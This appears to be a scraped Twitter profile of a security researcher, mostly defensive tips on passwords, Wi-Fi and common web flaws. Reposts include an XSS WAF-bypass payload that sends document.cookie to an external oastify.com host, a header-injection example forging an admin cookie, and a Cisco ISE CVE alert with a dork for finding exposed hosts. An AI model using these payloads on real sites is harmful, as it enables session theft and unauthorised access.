Anonymode (@anonymode1) 's Twitter Profile
Anonymode

@anonymode1

RedTeamer || Hacker @anonysec_

ID: 1320236178436739074

linkhttp://linktr.ee/anonymode calendar_today25-10-2020 05:30:22

3,3K Tweet

3,3K Followers

3,3K Following

Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

๐ŸšจCVE-2025-20281 & CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC โ€ข CVSS: 10 โ€ข ZoomEye Dork: app="Cisco ISE" โ€ข Results: 1,937 โ€ข Advisory: github.com/advisories/GHSโ€ฆ โ€ข PoC: github.com/abrewer251/CVEโ€ฆ โ€ข ZoomEye Search: zoomeye.ai/searchResult?qโ€ฆ

๐ŸšจCVE-2025-20281 & CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC

โ€ข CVSS: 10
โ€ข ZoomEye Dork: app="Cisco ISE"
โ€ข Results: 1,937
โ€ข Advisory:
github.com/advisories/GHSโ€ฆ

โ€ข PoC: github.com/abrewer251/CVEโ€ฆ

โ€ข ZoomEye Search: zoomeye.ai/searchResult?qโ€ฆ
Anonymode (@anonymode1) 's Twitter Profile Photo

Stay alert online. ๐Ÿง ๐Ÿ’ฅ โœ… Use strong passwords โœ… Enable 2FA โœ… Donโ€™t click suspicious links ๐Ÿ›ก๏ธ YOU are your first line of defense. #CyberSecurity #InfoSec #CyberAware #Anonysec

Stay alert online. ๐Ÿง ๐Ÿ’ฅ
โœ… Use strong passwords
โœ… Enable 2FA
โœ… Donโ€™t click suspicious links
๐Ÿ›ก๏ธ YOU are your first line of defense.

#CyberSecurity #InfoSec #CyberAware #Anonysec
Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿšจ XXE (XML External Entity) attacks can: ๐Ÿ”“ Leak server files ๐ŸŒ Trigger SSRF ๐Ÿ’ฃ Crash apps ๐Ÿ›ก Mitigate by disabling DTDs + using secure parsers. #XXE #CyberSecurity #BugBounty #InfoSec #Anonysec #OWASP #Hacking

๐Ÿšจ XXE (XML External Entity) attacks can:
๐Ÿ”“ Leak server files
๐ŸŒ Trigger SSRF
๐Ÿ’ฃ Crash apps

๐Ÿ›ก Mitigate by disabling DTDs + using secure parsers.
#XXE #CyberSecurity #BugBounty #InfoSec #Anonysec #OWASP #Hacking
Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿšจ Cyber Tip Thursday Beware of Evil Twin Wi-Fi ๐Ÿง  Fake hotspots like โ€œFree_Airport_WiFiโ€ can steal your data! ๐Ÿ›ก Stay safe: โ€“ Use VPN โ€“ Donโ€™t auto-connect โ€“ Confirm Wi-Fi names #CyberSecurity #Anonysec #HackAware #WiFiHack

๐Ÿšจ Cyber Tip Thursday
Beware of Evil Twin Wi-Fi ๐Ÿง 
Fake hotspots like โ€œFree_Airport_WiFiโ€ can steal your data!

๐Ÿ›ก Stay safe:
โ€“ Use VPN
โ€“ Donโ€™t auto-connect
โ€“ Confirm Wi-Fi names

#CyberSecurity #Anonysec #HackAware #WiFiHack
N$ (@nav1n0x) 's Twitter Profile Photo

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty
Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿ” Cyber Tip Friday Stop saving passwords in browsers! โš ๏ธ Hackers & malware can steal them. โœ… Use a password manager โœ… Enable 2FA

๐Ÿ” Cyber Tip Friday Stop saving passwords in browsers! โš ๏ธ Hackers & malware can steal them. โœ… Use a password manager โœ… Enable 2FA
Anonymode (@anonymode1) 's Twitter Profile Photo

Server-side vulnerabilities are silent killers. They let hackers bypass logic, exploit APIs, & steal data from the backend. Always validate inputs server-side, not just on the frontend.

Anonymode (@anonymode1) 's Twitter Profile Photo

There's a difference between a hacker and a criminal. ๐Ÿ”ธ Ethical hackers protect systems ๐Ÿ”ธ Black hats exploit them ๐Ÿ”ธ Grey hats walk the line ๐Ÿ’ก Learn the rules, master the tools, and hack for good. The digital world needs defenders, not destroyers

Anonymode (@anonymode1) 's Twitter Profile Photo

SSRF (Server-Side Request Forgery) lets attackers trick a server into making requests to internal or external systems. โš ๏ธ Can expose internal data & services. ๐Ÿ›ก๏ธ Always validate user-supplied URLs. #SSRF #CyberSecurity #BugBounty

Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿšจ File Upload Vulnerability ๐Ÿšจ When users can upload files without proper validation, attackers can upload malicious scripts (e.g., .php, .jsp) and gain server access. #BugBounty #CyberSecurity #WebSec

Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿšจ Broken Access Control ๐Ÿ›‘ Attackers can bypass permissions & access data they're not supposed toโ€”like becoming admin without logging in as one! ๐Ÿ˜ฑ ๐Ÿ”“ Always enforce proper access checks on every request. #CyberSecurity #OWASP #Hacking #BugBounty #InfoSec #Anonymode

NullSecX (@nullsecurityx) 's Twitter Profile Photo

๐Ÿง  HTTP Header Injection โ†’ Redirect Abuse 1๏ธโƒฃ App reflects user input in headers: Location: https://site/./com/welcome?user=$input 2๏ธโƒฃ Attacker injects \nSet-Cookie: admin=true 3๏ธโƒฃ Header split โ†’ response poisoning ๐ŸŽฏ Leads to auth bypass or cache poisoning #bugbounty #owasp

๐Ÿง  HTTP Header Injection โ†’ Redirect Abuse
1๏ธโƒฃ App reflects user input in headers:
Location: https://site/./com/welcome?user=$input
2๏ธโƒฃ Attacker injects \nSet-Cookie: admin=true
3๏ธโƒฃ Header split โ†’ response poisoning
๐ŸŽฏ Leads to auth bypass or cache poisoning
#bugbounty #owasp
Anonymode (@anonymode1) 's Twitter Profile Photo

๐Ÿ’กCybersecurity isnโ€™t just about strong passwords โ€” itโ€™s about securing the WHOLE attack surface. #CyberSecurity #BugBounty #InfoSec #Hacking #RedTeam #Anonysec

Anonymode (@anonymode1) 's Twitter Profile Photo

Did you know? Most hackers don't โ€œhackโ€ โ€” they just log in. Hereโ€™s how: ๐Ÿ•ต๏ธโ€โ™‚๏ธ They scrape public data ๐ŸŒ They find exposed subdomains ๐Ÿ“ They analyze JavaScript for secrets ๐Ÿงช They test parameters for hidden functions.. you are pawned!!!